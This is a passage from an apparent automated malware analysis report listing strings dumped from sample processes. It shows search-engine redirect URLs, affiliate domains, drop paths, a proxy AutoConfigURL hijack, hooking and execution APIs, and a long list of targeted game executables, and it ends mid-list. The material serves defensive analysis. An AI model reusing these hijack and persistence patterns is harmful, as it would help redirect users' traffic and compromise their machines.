(srv03_sp2_qfe.080819-1207)</pre><pre>6.00.3790.4392 (srv03_sp2_gdr.081016-1620)</pre><pre>6.00.3790.4392 (srv03_sp2_qfe.081016-1620)</pre><pre>6.00.3790.4470 (srv03_sp2_gdr.090303-1204)</pre><pre>6.00.3790.4470 (srv03_sp2_qfe.090303-1204)</pre><pre>6.00.3790.4504 (srv03_sp2_gdr.090428-1405)</pre><pre>6.00.3790.4504 (srv03_sp2_qfe.090428-1405)</pre><pre>6.00.3790.4539 (srv03_sp2_gdr.090626-1428)</pre><pre>6.00.3790.4539 (srv03_sp2_qfe.090626-1428)</pre><pre>6.00.3790.4589 (srv03_sp2_gdr.090914-1233)</pre><pre>6.00.3790.4589 (srv03_sp2_qfe.090914-1233)</pre><pre>6.00.3790.4672 (srv03_sp2_gdr.100225-1230)</pre><pre>6.00.3790.4672 (srv03_sp2_qfe.100225-1230)</pre><pre>6.00.3790.4696 (srv03_sp2_gdr.100419-1942)</pre><pre>6.00.3790.4732 (srv03_sp2_gdr.100623-0356)</pre><pre>6.00.3790.4732 (srv03_sp2_qfe.100623-0356)</pre><pre>6.00.3790.4772 (srv03_sp2_gdr.100908-1010)</pre><pre>6.00.3790.4772 (srv03_sp2_qfe.100908-1010)</pre><pre>6.00.3790.4795 (srv03_sp2_qfe.101103-0357)</pre><pre>6.00.3790.4807 (srv03_sp2_gdr.101220-0307)</pre><pre>6.00.3790.4807 (srv03_sp2_qfe.101220-0307)</pre><pre>6.00.3790.4835 (srv03_sp2_gdr.110222-0239)</pre><pre>6.00.3790.4835 (srv03_sp2_qfe.110222-0239)</pre><pre>6.00.3790.4857 (srv03_sp2_gdr.110425-0335)</pre><pre>6.00.3790.4857 (srv03_sp2_qfe.110425-0335)</pre><pre>6.00.3790.4879 (srv03_sp2_gdr.110621-0342)</pre><pre>6.00.3790.4879 (srv03_sp2_qfe.110621-0342)</pre><pre>6.00.3790.4904 (srv03_sp2_gdr.110905-0334)</pre><pre>6.00.3790.4904 (srv03_sp2_qfe.110905-0334)</pre><pre>6.00.3790.4929 (srv03_sp2_gdr.111104-0342)</pre><pre>6.00.3790.4929 (srv03_sp2_qfe.111104-0342)</pre><pre>6.00.3790.4944 (srv03_sp2_gdr.111216-0308)</pre><pre>6.00.3790.4944 (srv03_sp2_qfe.111216-0308)</pre><pre>6.00.3790.4969 (srv03_sp2_gdr.120228-0234)</pre><pre>6.00.3790.4969 (srv03_sp2_qfe.120228-0234)</pre><pre>6.00.3790.5004 (srv03_sp2_gdr.120515-0336)</pre><pre>6.00.3790.5004 (srv03_sp2_qfe.120515-0336)</pre><pre>6.00.3790.5029 (srv03_sp2_gdr.120628-0335)</pre><pre>6.00.3790.5029 (srv03_sp2_qfe.120628-0335)</pre><pre>6.00.3790.5060 (srv03_sp2_gdr.120824-0334)</pre><pre>6.00.3790.5060 (srv03_sp2_qfe.120824-0334)</pre><pre>6.00.3790.5080 (srv03_sp2_gdr.121026-1534)</pre><pre>6.00.3790.5080 (srv03_sp2_qfe.121026-1534)</pre><pre>HTTP/1.</pre><pre>HTTP/1.1 302 Moved Temporarily</pre><pre>http://www.baidu.com/s? tn=</pre><pre>http://www.baidu.com/</pre><pre>http://www.sogou.com/sogou? pid=</pre><pre>http://www.sogou.com/index. pid=</pre><pre>http://rlt.inte.sogou.com/</pre><pre><html><head><meta http-equiv="refresh" content="0;url=</pre><pre>[i 1]){b.href=</pre><pre>[i]==b.id){if (b.href!=</pre><pre>.length;i =2){if (</pre><pre>&cmv=X</pre><pre>window.sogou_adclk</pre><pre>http://www.baidu.com/ tn=-wd=-word=</pre><pre>tn=%s</pre><pre>http://www.hao123.com/ tn=</pre><pre>.google.com</pre><pre>pv.sogou.com</pre><pre>pb.sogou.com</pre><pre>.tanghulu.cc</pre><pre>.zclm8.com</pre><pre>.wq581.com</pre><pre>.maimeng8.com</pre><pre>.5sla.com</pre><pre>.wb360.net</pre><pre>.renren.com</pre><pre>.jj123.com.cn</pre><pre>.iwb110.com</pre><pre>.wb12318.com</pre><pre>.woai310.com</pre><pre>.58lianmeng.com</pre><pre>dwVAOffset:X</pre><pre>.data</pre><pre>.text</pre><pre>FILE_EXECUTE</pre><pre>FILE_GENERIC_EXECUTE</pre><pre>GENERIC_EXECUTE</pre><pre>%WinDir%\share\rsvp\objs.exe</pre><pre>%System%\DqKgbb.dll</pre><pre>{6795ED75-58AA-8E4C-A8EA-3CAD7C47AB03}</pre><pre>http://index.woai310.com/index.htm?u=52097</pre><pre>GetProcessHeap</pre><pre>WinExec</pre><pre>GetCPInfo</pre><pre>RegDeleteKeyA</pre><pre>RegQueryInfoKeyA</pre><pre>RegEnumKeyExA</pre><pre>RegCreateKeyExA</pre><pre>RegCreateKeyA</pre><pre>RegOpenKeyA</pre><pre>RegCloseKey</pre><pre>UrlUnescapeA</pre><pre>EnumWindows</pre><pre>SetWindowsHookExA</pre><pre>EnumChildWindows</pre><pre>InternetCanonicalizeUrlA</pre><pre>InternetCrackUrlA</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>KERNEL32.DLL</pre><pre>iphlpapi.dll</pre><pre>OLEAUT32.dll</pre><pre>PSAPI.DLL</pre><pre>USER32.dll</pre><pre>VERSION.dll</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><pre>Loader.dll</pre><pre>{9a4dda61-1d3a-49b7-9849-dac6cd30a393}</pre><pre>AutoConfigURL</pre><pre>_IID_IWEBBROWSER</pre><pre>MSAFD Tcpip [TCP/IP]</pre><pre>MSAFD Tcpip [UDP/IP]</pre><pre>MSAFD Tcpip [RAW/IP]</pre><pre>RSVP UDP Service Provider</pre><pre>\Device\NetBT_Tcpip</pre><pre>RSVP TCP Service Provider</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] SEQPACKET 0</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] DATAGRAM 0</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] SEQPACKET 1</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] DATAGRAM 1</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] SEQPACKET 2</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] DATAGRAM 2</pre><pre>ikeeper.dll</pre><pre>rsvpsp.dll</pre><pre>nwprovau.dll</pre><pre>winrnr.dll</pre><b>objs.exe_3332_rwx_10001000_0002E000:</b><pre>__MSVCRT_HEAP_SELECT</pre><pre>user32.dll</pre><pre>PSAPI.DLL</pre><pre>i4VO.Wn}}4</pre><pre>uJ 9%d</pre><pre>s%F'`f</pre><pre>vp%Cl }F.</pre><pre>.Lu.-$ A</pre><pre>>%FZ7~</pre><pre>.DcPn%*</pre><pre>HN6.QK</pre><pre>KERNEL32.DLL</pre><pre>ADVAPI32.dll</pre><pre>iphlpapi.dll</pre><pre>ole32.dll</pre><pre>OLEAUT32.dll</pre><pre>SHLWAPI.dll</pre><pre>USER32.dll</pre><pre>VERSION.dll</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><pre>Loader.dll</pre><pre>Base:X</pre><pre>DLL_PROCESS_ATTACH %d</pre><pre>Length:%d opcode X offset:%d</pre><pre>MsgDebugView</pre><pre>%System%\DqKgbb.dll</pre><pre>%WinDir%\share\rsvp\objs.exe</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><b>dsau.exe_3672:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>__MSVCRT_HEAP_SELECT</pre><pre>user32.dll</pre><pre>GetProcessHeap</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>GDI32.dll</pre><pre>RegOpenKeyExA</pre><pre>RegCloseKey</pre><pre>ADVAPI32.dll</pre><pre>ShellExecuteExA</pre><pre>SHELL32.dll</pre><pre>ole32.dll</pre><pre>UrlUnescapeA</pre><pre>SHLWAPI.dll</pre><pre>DeleteUrlCacheEntry</pre><pre>InternetCrackUrlA</pre><pre>InternetCanonicalizeUrlA</pre><pre>HttpQueryInfoA</pre><pre>HttpSendRequestA</pre><pre>HttpOpenRequestA</pre><pre>WININET.dll</pre><pre>GetTcpStatistics</pre><pre>GetUdpStatistics</pre><pre>iphlpapi.dll</pre><pre>WS2_32.dll</pre><pre>PSAPI.DLL</pre><pre>GetCPInfo</pre><pre>qq.exe</pre><pre>07motogp.exe</pre><pre>100YearsWar.exe</pre><pre>120yen.exe</pre><pre>139game.exe</pre><pre>168.exe</pre><pre>175ptclient.exe</pre><pre>218client.releasetest.win32.exe</pre><pre>51ditu.exe</pre><pre>51game.exe</pre><pre>51gg.exe</pre><pre>5spots2.exe</pre><pre>78bar.exe</pre><pre>7fgame.exe</pre><pre>7hero.exe</pre><pre>7k2.exe</pre><pre>8monline.exe</pre><pre>9-pota.exe</pre><pre>9158.exe</pre><pre>9158virtualcamera.exe</pre><pre>9258cu.exe</pre><pre>99game.exe</pre><pre>9liao.exe</pre><pre>9ptv.exe</pre><pre>9show.exe</pre><pre>a51.exe</pre><pre>aa3game.exe</pre><pre>aaw.exe</pre><pre>academy.exe</pre><pre>acclient.exe</pre><pre>accproxy.exe</pre><pre>aceonline.exe</pre><pre>acg3x.exe</pre><pre>aclient.exe</pre><pre>aclientsd.exe</pre><pre>aclientx.exe</pre><pre>acrord32.exe</pre><pre>actofwar_hightreason.exe</pre><pre>adico.exe</pre><pre>adl.exe</pre><pre>adsanguo.exe</pre><pre>age2_x1.exe</pre><pre>age3.exe</pre><pre>ago.exe</pre><pre>AIKACN.exe</pre><pre>airplay.exe</pre><pre>airraid.exe</pre><pre>airstrike3d ii - gulf.exe</pre><pre>aladdinpinball.exe</pre><pre>alefclient.exe</pre><pre>alicall.exe</pre><pre>alienshooter.exe</pre><pre>alienshooter2.exe</pre><pre>aliim.exe</pre><pre>alogin.exe</pre><pre>alone.exe</pre><pre>alphaprime.exe</pre><pre>amped.exe</pre><pre>and yet it moves.exe</pre><pre>angel.dat</pre><pre>angelslg.exe</pre><pre>angeraze.exe</pre><pre>anno1701.exe</pre><pre>anno4.exe</pre><pre>aom.exe</pre><pre>apolloguarbian.exe</pre><pre>aqaq.exe</pre><pre>araymor.exe</pre><pre>arcanum_cn_font.exe</pre><pre>arclive.exe</pre><pre>arma.exe</pre><pre>arma2.exe</pre><pre>armada tanks.exe</pre><pre>artiece.exe</pre><pre>asabilli.exe</pre><pre>asdegame.exe</pre><pre>asiatrader.exe</pre><pre>asktao.mod</pre><pre>asn.exe</pre><pre>assassinscreed_dx9.exe</pre><pre>assaultgear.exe</pre><pre>atlantica.exe</pre><pre>atlanticapatcher_clone.exe</pre><pre>atlanticarun.exe</pre><pre>atomica.exe</pre><pre>atrix.exe</pre><pre>attack on pearl harbor.exe</pre><pre>audition.exe</pre><pre>autopatch_d.exe</pre><pre>AVA.exe</pre><pre>avast!.exe</pre><pre>avencast.exe</pre><pre>awe.exe</pre><pre>azadaancientmagic.exe</pre><pre>aztectribe.exe</pre><pre>baboinvasion.exe</pre><pre>baby.exe</pre><pre>baihh.exe</pre><pre>ball.exe</pre><pre>bao.dat</pre><pre>basketball.exe</pre><pre>battleship.exe</pre><pre>battlestationspacific.exe</pre><pre>bb2.exe</pre><pre>bbgame.exe</pre><pre>bbrk32.exe</pre><pre>bckings.exe</pre><pre>bcr.exe</pre><pre>bdgame.exe</pre><pre>bdplayer.exe</pre><pre>beasts.exe</pre><pre>beautymj.exe</pre><pre>beertend.exe</pre><pre>beijing.exe</pre><pre>belief.exe</pre><pre>beowulf.exe</pre><pre>bf1942.exe</pre><pre>bf2.exe</pre><pre>bf2142.exe</pre><pre>bh2000.exe</pre><pre>bh2002.exe</pre><pre>bigfoot.exe</pre><pre>bin.exe</pre><pre>binarystar.exe</pre><pre>bio3_pc.exe</pre><pre>bionic_commando.exe</pre><pre>bioshock.exe</pre><pre>birdpirates.exe</pre><pre>bistro2.exe</pre><pre>biubiu.exe</pre><pre>blackops2.exe</pre><pre>blade.exe</pre><pre>blueskyclient_r.exe</pre><pre>bmw.exe</pre><pre>Bo.exe</pre><pre>bob.exe</pre><pre>book.exe</pre><pre>bookwormadventures.exe</pre><pre>boomvoyage.exe</pre><pre>boonline.exe</pre><pre>borderlands.exe</pre><pre>boun.exe</pre><pre>bpsthestrike.exe</pre><pre>braid.exe</pre><pre>bravedwarves2.exe</pre><pre>brixformer.exe</pre><pre>bronze.exe</pre><pre>bsclient.exe</pre><pre>btby.exe</pre><pre>btby5.exe</pre><pre>budredhead.exe</pre><pre>bug3d.exe</pre><pre>bugix.exe</pre><pre>burma.exe</pre><pre>burningwheelshi.exe</pre><pre>burnoutparadise.exe</pre><pre>c3.exe</pre><pre>ca.exe</pre><pre>cabalmain.exe</pre><pre>caesariv.exe</pre><pre>caihong.exe</pre><pre>caishun.exe</pre><pre>callsft.exe</pre><pre>cap2.exe</pre><pre>carpediem.exe</pre><pre>casebook.exe</pre><pre>castle2.exe</pre><pre>cc.exe</pre><pre>ccms.exe</pre><pre>cctvbox.exe</pre><pre>cdcgames.exe</pre><pre>cdeath.exe</pre><pre>ceo.exe</pre><pre>cf3-wt.exe</pre><pre>cg.exe</pre><pre>cgate.exe</pre><pre>cg_item_6000.exe</pre><pre>chaktemple.exe</pre><pre>changoo.exe</pre><pre>chaoslegion.exe</pre><pre>chathall.exe</pre><pre>chbazar.exe</pre><pre>checker.exe</pre><pre>chenuen_c.exe</pre><pre>china_login.mpr</pre><pre>chuangshi.exe</pre><pre>cidthedummy.exe</pre><pre>citylife.exe</pre><pre>civili.exe</pre><pre>civilization.exe</pre><pre>civilization4.exe</pre><pre>CJ7.exe</pre><pre>cldphba.exe</pre><pre>client.dat</pre><pre>client.dat/s3d.exe</pre><pre>client.exe</pre><pre>client1.dat</pre><pre>clientgui_r.exe</pre><pre>clientlb.exe</pre><pre>clientlb2.exe</pre><pre>ClientXkx.exe</pre><pre>clutch.exe</pre><pre>cm0304.exe</pre><pre>cm2010.exe</pre><pre>cmr4.exe</pre><pre>cngame_lava.exe</pre><pre>coa.exe</pre><pre>cocotokart.exe</pre><pre>cod2sp_s.exe</pre><pre>coduomp.exe</pre><pre>codwaw.exe</pre><pre>coffeehousechaos.exe</pre><pre>cojbibgame_x86.exe</pre><pre>coldfear_retail.exe</pre><pre>comandos.exe</pre><pre>coman_mp.exe</pre><pre>comeon.exe</pre><pre>comicui.exe</pre><pre>comm2.exe</pre><pre>commandos3.exe</pre><pre>commxpc.exe</pre><pre>conan.exe</pre><pre>conc3ep1.dat</pre><pre>conew.exe</pre><pre>conflictglobal.exe</pre><pre>conquer.exe</pre><pre>conquest.exe</pre><pre>core.exe</pre><pre>cortex command.exe</pre><pre>cosg.exe</pre><pre>cosmicstacker.exe</pre><pre>cpcw.exe</pre><pre>cq.exe</pre><pre>cradio.exe</pre><pre>crayon.exe</pre><pre>crazykartclient.dat</pre><pre>crazymachinesnc.exe</pre><pre>crazyparty.exe</pre><pre>crazyslug.exe</pre><pre>crhsp.exe</pre><pre>cricket2009.exe</pre><pre>crimson-road.exe</pre><pre>crimsonland.exe</pre><pre>crossfire.exe</pre><pre>cryostasis.exe</pre><pre>crysis.exe</pre><pre>crystalpath.exe</pre><pre>cs2.exe</pre><pre>cs??????.exe</pre><pre>csautopatch.exe</pre><pre>csmate.exe</pre><pre>cstrike-online.exe</pre><pre>cstrike.exe</pre><pre>csxy.exe</pre><pre>ct3.exe</pre><pre>ctracer.exe</pre><pre>cueclub.exe</pre><pre>cupcakecafe.exe</pre><pre>cupid2.exe</pre><pre>cxiadan.exe</pre><pre>cy2108.exe</pre><pre>cyboqq.exe</pre><pre>czero.exe</pre><pre>d&p.exe</pre><pre>d2loader.exe</pre><pre>d2r.exe</pre><pre>da1_2cn_ntl.exe</pre><pre>da2.exe</pre><pre>daisy.exe</pre><pre>damngame.exe</pre><pre>danceclient.exe</pre><pre>daorigins.exe</pre><pre>darkathena.exe</pre><pre>darkestofdays.exe</pre><pre>dconline.exe</pre><pre>ddl.exe</pre><pre>ddozen2ch.exe</pre><pre>ddr99.exe</pre><pre>ddvlobby.exe</pre><pre>dead space.exe</pre><pre>deathtrack.exe</pre><pre>defensegrid.exe</pre><pre>defiance.exe</pre><pre>dekaron.exe</pre><pre>demigod.exe</pre><pre>demonstone.exe</pre><pre>deusex.exe</pre><pre>devilmaycry4_dx9.exe</pre><pre>df.exe</pre><pre>dfantasy.exe</pre><pre>dfbhd.exe</pre><pre>dflw.exe</pre><pre>dftfd.tmpo</pre><pre>dfx.exe</pre><pre>DGOnline.exe</pre><pre>dgw.exe</pre><pre>digb.exe</pre><pre>digimonrpg.exe</pre><pre>diner dash.exe</pre><pre>dinerdash2.exe</pre><pre>dino2.exe</pre><pre>dirt.exe</pre><pre>discipl2.exe</pre><pre>disney.dat</pre><pre>Disney.exe</pre><pre>div.exe</pre><pre>divinity2.exe</pre><pre>djonline.exe</pre><pre>dk2.exe</pre><pre>dkii.exe</pre><pre>dkpclient.exe</pre><pre>dlords.exe</pre><pre>dlz.exe</pre><pre>dmc3se.exe</pre><pre>dmcr.exe</pre><pre>dmz.exe</pre><pre>dnf.exe</pre><pre>do.exe</pre><pre>dobol.exe</pre><pre>dod.exe</pre><pre>dokee.exe</pre><pre>dontrun2.exe</pre><pre>doom3.exe</pre><pre>dosbox.exe</pre><pre>doughman.exe</pre><pre>doukutsu.exe</pre><pre>dow2.exe</pre><pre>Dragon.exe</pre><pre>dragonhatchery.exe</pre><pre>dragonhunter.exe</pre><pre>dragonica.exe</pre><pre>DragonNest.exe</pre><pre>dragonraja.exe</pre><pre>dragons.exe</pre><pre>drawn.exe</pre><pre>dreamc.exe</pre><pre>dreamgps.exe</pre><pre>dreamkiller.exe</pre><pre>driv3r.exe</pre><pre>droiyan online.exe</pre><pre>DroiyanOnline.exe</pre><pre>ds.exe</pre><pre>dtg.exe</pre><pre>dtrmain.exe</pre><pre>dtws.exe</pre><pre>duiyi.exe</pre><pre>dune2000.dat</pre><pre>dungeonsiege.exe</pre><pre>dungeonsiege2.exe</pre><pre>duomao.exe</pre><pre>duospeak.exe</pre><pre>dusk.exe</pre><pre>dw_r.exe</pre><pre>dxball2.exe</pre><pre>DxLauncher.exe</pre><pre>dynasty.exe</pre><pre>dynomite.exe</pre><pre>dyntmp1.dat</pre><pre>dzh.exe</pre><pre>dzh2.exe</pre><pre>e-space.exe</pre><pre>eagleii.tmpo</pre><pre>eastfantasy.exe</pre><pre>ebe2.exe</pre><pre>ee2.exe</pre><pre>ee3.exe</pre><pre>eets.exe</pre><pre>efte.exe</pre><pre>ef_first_cn.exe</pre><pre>eib.exe</pre><pre>ekd5.exe</pre><pre>electronica.exe</pre><pre>elementclient.exe</pre><pre>elfbowling.exe</pre><pre>elite sniper.exe</pre><pre>elven mists.exe</pre><pre>elvenlegacy.exe</pre><pre>em4.exe</pre><pre>emberwind.exe</pre><pre>emperor.exe</pre><pre>empire earth.exe</pre><pre>empire.exe</pre><pre>empiresx.exe</pre><pre>enclave.exe</pre><pre>endwar.exe</pre><pre>engine.exe</pre><pre>enigmo 2.exe</pre><pre>enigmo.exe</pre><pre>eos-launcher.exe</pre><pre>eragon.exe</pre><pre>eread_cookcase.exe</pre><pre>et.exe</pre><pre>eten.exe</pre><pre>eternitys child.exe</pre><pre>etherlords2.exe</pre><pre>ethervapor.exe</pre><pre>etn.exe</pre><pre>etrom.exe</pre><pre>eufloria.exe</pre><pre>ewjim3.exe</pre><pre>exefile.exe</pre><pre>exigo.exe</pre><pre>exlauncher.exe</pre><pre>ezero.exe</pre><pre>eztalk.exe</pre><pre>f22.exe</pre><pre>fable.exe</pre><pre>facesofwar.exe</pre><pre>fact.exe</pre><pre>faerie solitaire reflexive.exe</pre><pre>fallout3.exe</pre><pre>farcry.exe</pre><pre>farcry2.exe</pre><pre>farm2.exe</pre><pre>farmfrenzy3.exe</pre><pre>fastait.exe</pre><pre>fate.exe</pre><pre>fcgames.exe</pre><pre>fcruner.exe</pre><pre>fea.exe</pre><pre>fear2.exe</pre><pre>feather.exe</pre><pre>feeding.exe</pre><pre>feitian.exe</pre><pre>fetionfx.exe</pre><pre>fetionvm.exe</pre><pre>fezero_client.exe</pre><pre>ff.exe</pre><pre>ff2client.exe</pre><pre>ffow.exe</pre><pre>fibertwig.exe</pre><pre>fifa07.exe</pre><pre>fifa08.exe</pre><pre>fifa09.exe</pre><pre>fifa10.exe</pre><pre>fifa2004.exe</pre><pre>fifawc.exe</pre><pre>FightingSoccer.exe</pre><pre>filepatch.exe</pre><pre>finalburn0113.exe</pre><pre>findbug.exe</pre><pre>fishdomfrosty.exe</pre><pre>fj.exe</pre><pre>fjlogin.exe</pre><pre>flatout2.exe</pre><pre>flock.exe</pre><pre>flowerquest.exe</pre><pre>fm.exe</pre><pre>fodhero.exe</pre><pre>foh.exe</pre><pre>fongyung.exe</pre><pre>foobar2000.exe</pre><pre>forever.exe</pre><pre>forgottenriddles_v113.exe</pre><pre>formatfactory.exe</pre><pre>foxit reader.exe</pre><pre>freecall.exe</pre><pre>freedom.exe</pre><pre>freejackclient.exe</pre><pre>freelancer.exe</pre><pre>FreeRacing.exe</pre><pre>freerunning.exe</pre><pre>freestyle.exe</pre><pre>FreeStyle2.exe</pre><pre>fs2loadersp.exe</pre><pre>fsasgame.exe</pre><pre>fsonline2.exe</pre><pre>fsx.exe</pre><pre>ftgmos.exe</pre><pre>ft_client.exe</pre><pre>fuel.exe</pre><pre>fwclient.exe</pre><pre>fw_r.exe</pre><pre>fxllk.exe</pre><pre>fzwmb.exe</pre><pre>gaccoreloader.exe</pre><pre>GacRunner.exe</pre><pre>galciv2.exe</pre><pre>game.dat</pre><pre>game.exe</pre><pre>gameapp.exe</pre><pre>gamecap.exe</pre><pre>gameclient.dat</pre><pre>GameClient.exe</pre><pre>gameClient.exe</pre><pre>gameclient_release.exe</pre><pre>gamedatabaselib.exe</pre><pre>gameexe.exe</pre><pre>gamefree.exe</pre><pre>gamehall.exe</pre><pre>gamelobby.exe</pre><pre>gamemd.exe</pre><pre>gamenew.exe</pre><pre>gameplace.exe</pre><pre>gameplaza.exe</pre><pre>gamesetman.exe</pre><pre>gamestplat.exe</pre><pre>game_client.exe</pre><pre>game_client.exe</pre><pre>game_exe.exe</pre><pre>game_release.exe</pre><pre>game_release.exe</pre><pre>gaml.exe</pre><pre>gangland.exe</pre><pre>gaqp.exe</pre><pre>garden.exe</pre><pre>garena.exe</pre><pre>gc.exe</pre><pre>gc12.exe</pre><pre>gcd.exe</pre><pre>gc_zh.exe</pre><pre>gds2003.exe</pre><pre>gdsonline.exe</pre><pre>gdzq.exe</pre><pre>ge.exe</pre><pre>geargrinder.exe</pre><pre>genzo.exe</pre><pre>gforce.exe</pre><pre>gfxz.exe</pre><pre>ggdx.exe</pre><pre>ggxx.exe</pre><pre>gh3.exe</pre><pre>ghmain.exe</pre><pre>ghost_w32.exe</pre><pre>ghsalncr.exe</pre><pre>gh_client.exe</pre><pre>gish.exe</pre><pre>gits.exe</pre><pre>glauncher.exe</pre><pre>gldgwq.exe</pre><pre>gloader.exe</pre><pre>globalops.tmpo</pre><pre>glqyf.exe</pre><pre>glshell.exe</pre><pre>glworld.exe</pre><pre>go.exe</pre><pre>godfather2.exe</pre><pre>GodsWar.exe</pre><pre>gom.exe</pre><pre>gongfuclient.exe</pre><pre>gonline.exe</pre><pre>googleearth.exe</pre><pre>googletalk.exe</pre><pre>gostoneclient.exe</pre><pre>gothic3.exe</pre><pre>grandia2.exe</pre><pre>granny_download.exe</pre><pre>gravitybone.exe</pre><pre>graw.exe</pre><pre>graw2.exe</pre><pre>grid.exe</pre><pre>groundhog.exe</pre><pre>gsdii.exe</pre><pre>gsoorun.exe</pre><pre>gt-xxl.exe</pre><pre>gta-vc.exe</pre><pre>gta3.exe</pre><pre>gtaiv.exe</pre><pre>gta_sa.ex</pre><pre>gta_sa.exe</pre><pre>gtr2.exe</pre><pre>gtsaloon.exe</pre><pre>gtx.exe</pre><pre>guitarlaunch.exe</pre><pre>gui_platform.exe</pre><pre>gulong.exe</pre><pre>gumboycrazyadventures.exe</pre><pre>gunbound.gme</pre><pre>gunmetal.exe</pre><pre>gunship.exe</pre><pre>gurumin.exe</pre><pre>gxddance.exe</pre><pre>h sbeach.exe</pre><pre>h5_game.exe</pre><pre>h5_game_chs.exe</pre><pre>haha009.exe</pre><pre>hall.exe</pre><pre>hallmain.exe</pre><pre>halo.exe</pre><pre>hammerheads.exe</pre><pre>hamsterball.exe</pre><pre>happa64.exe</pre><pre>happypets.exe</pre><pre>happystar.exe</pre><pre>hawx.exe</pre><pre>ha_run.exe</pre><pre>heavy weapon deluxe.exe</pre><pre>hedgehogs.exe</pre><pre>helldorado.exe</pre><pre>hellgate_sp_dx9_x86.exe</pre><pre>hero.exe</pre><pre>hero.mod</pre><pre>hero108.exe</pre><pre>heroes2.exe</pre><pre>heroes3.exe</pre><pre>heroes4.exe</pre><pre>heroonline.exe</pre><pre>hexin.exe</pre><pre>hiddenmagic.exe</pre><pre>highwaynightshi.exe</pre><pre>hilife.exe</pre><pre>hinokakera.exe</pre><pre>hitman.exe</pre><pre>hitmanbloodmoney.exe</pre><pre>hitmancontracts.exe</pre><pre>hjd.exe</pre><pre>hl.exe</pre><pre>hl2.exe</pre><pre>HLQM.exe</pre><pre>hl_client.exe</pre><pre>HMZY.exe</pre><pre>hod2.exe</pre><pre>hod3launch.exe</pre><pre>hofd_release.exe</pre><pre>hoi2.exe</pre><pre>hoi3game.exe</pre><pre>homeworld2.exe</pre><pre>hotel giant 2.exe</pre><pre>hotel.exe</pre><pre>hsl.exe</pre><pre>htaroc.exe</pre><pre>htlauncher.exe</pre><pre>hugemanclient.exe</pre><pre>hulk.exe</pre><pre>humans.exe</pre><pre>hwpview.exe</pre><pre>hx2game.exe</pre><pre>hxebookv23.exe</pre><pre>hyo.exe</pre><pre>hypmain.exe</pre><pre>hypwise.exe</pre><pre>i-fluid.exe</pre><pre>iagent.exe</pre><pre>ibb.exe</pre><pre>iceland2.exe</pre><pre>igame.exe</pre><pre>igame236.exe</pre><pre>igi.exe</pre><pre>igi2_ch.exe</pre><pre>igneous.exe</pre><pre>igsmj2.exe</pre><pre>iku.exe</pre><pre>il2fb.exe</pre><pre>ilgame.exe</pre><pre>im.exe</pre><pre>ImagineClient.exe</pre><pre>imperium romanum.exe</pre><pre>incaquest.exe</pre><pre>incredibleink.exe</pre><pre>indigo prophecy.exe</pre><pre>initiald.exe</pre><pre>inn.exe</pre><pre>insaniquariumdeluxe.exe</pre><pre>ironman.exe</pre><pre>ising99 player.exe</pre><pre>islands.exe</pre><pre>ispania.exe</pre><pre>ispyfunhouse.exe</pre><pre>iw3sp.exe</pre><pre>iw4sp.exe</pre><pre>iwd2.exe</pre><pre>ixsr1.exe.exe</pre><pre>ja2.exe</pre><pre>jackkeane.exe</pre><pre>jadeengine_final.exe</pre><pre>jade_enr.exe</pre><pre>janeszoo.exe</pre><pre>javaw.exe</pre><pre>jaws.exe</pre><pre>jazz2.exe</pre><pre>jb_liveengine_s.exe</pre><pre>jd.exe</pre><pre>jdyoucj.exe</pre><pre>jericho.exe</pre><pre>jgame.exe</pre><pre>JHYClient.exe</pre><pre>jianghu.exe</pre><pre>jjbclient.exe</pre><pre>jjcclient.exe</pre><pre>jm.exe</pre><pre>joey_pc_cn.exe</pre><pre>joshua.exe</pre><pre>jpskb.exe</pre><pre>jungleheart.exe</pre><pre>jwclient.exe</pre><pre>jwgame.exe</pre><pre>jx2wzgame.exe</pre><pre>jx3client.exe</pre><pre>jyclient.exe</pre><pre>k3.exe</pre><pre>k4_tch.exe</pre><pre>k5.exe</pre><pre>kaiba_pc.exe</pre><pre>kapowmulti.exe</pre><pre>kartracer.exe</pre><pre>kartrider.exe</pre><pre>katakijin demo v3.0.exe</pre><pre>kb.exe</pre><pre>kc.exe</pre><pre>kdtmain.exe</pre><pre>keeper95.exe</pre><pre>keroro.dat</pre><pre>kh2.exe</pre><pre>khan.exe</pre><pre>khan2.exe</pre><pre>kiiik.exe</pre><pre>killingfloor.exe</pre><pre>kingmania.exe</pre><pre>kk.exe</pre><pre>kknd.exe</pre><pre>kknd2.exe</pre><pre>klclient.exe</pre><pre>klplayer.exe</pre><pre>knightv.exe</pre><pre>ko????????????.exe</pre><pre>koh.exe</pre><pre>kok3.exe</pre><pre>kotori.exe</pre><pre>kott2.exe</pre><pre>kqadtray.exe</pre><pre>kr2.exe</pre><pre>ktvclient.exe</pre><pre>ku6speedupper.exe</pre><pre>kugoo.exe</pre><pre>kuros.exe</pre><pre>kwmusic.exe</pre><pre>Kxg.exe</pre><pre>kxqa.exe</pre><pre>kxtdplaza.exe</pre><pre>laizi.exe</pre><pre>lasr.exe</pre><pre>lataleclient.exe</pre><pre>latalelaclient.exe</pre><pre>latalelauncher.exe</pre><pre>lauch.exe</pre><pre>launch.exe</pre><pre>launcher.exe</pre><pre>launcherclient.exe</pre><pre>lazeskaclient.exe</pre><pre>left 4 